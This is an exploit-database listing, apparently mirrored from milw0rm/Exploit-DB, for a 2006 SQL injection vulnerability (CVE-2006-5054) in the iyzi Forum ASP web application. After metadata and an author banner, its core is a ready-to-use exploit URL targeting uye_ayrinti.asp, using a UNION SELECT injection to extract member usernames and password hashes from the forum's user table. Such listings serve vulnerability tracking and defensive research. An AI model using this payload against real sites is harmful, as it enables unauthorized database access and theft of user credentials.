[] NeoSense
E X P L O I T S
title author type platform port cve id

iyzi Forum 1.0 Beta 3 - SQL Injection

Author: Fix TR
type: webapps
platform: asp
port: 
date_added: 2006-09-23 
date_updated: 2017-01-06 
verified: 1 
codes: OSVDB-31430;CVE-2006-5054 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comiyziForums1b3.01tr.zip
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability      +
+ Author  : Fix TR                                       +
+ Site    : www.hack.gen.tr                              +
+ Contact : fixtr[at]bsdmail.com                         +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Download & Info: http://www.aspindir.com/Goster/2981
Bug In         : uye_ayrinti.asp
Risk           : High

Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1

Password encrytped with SHA-256

# milw0rm.com [2006-09-24]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.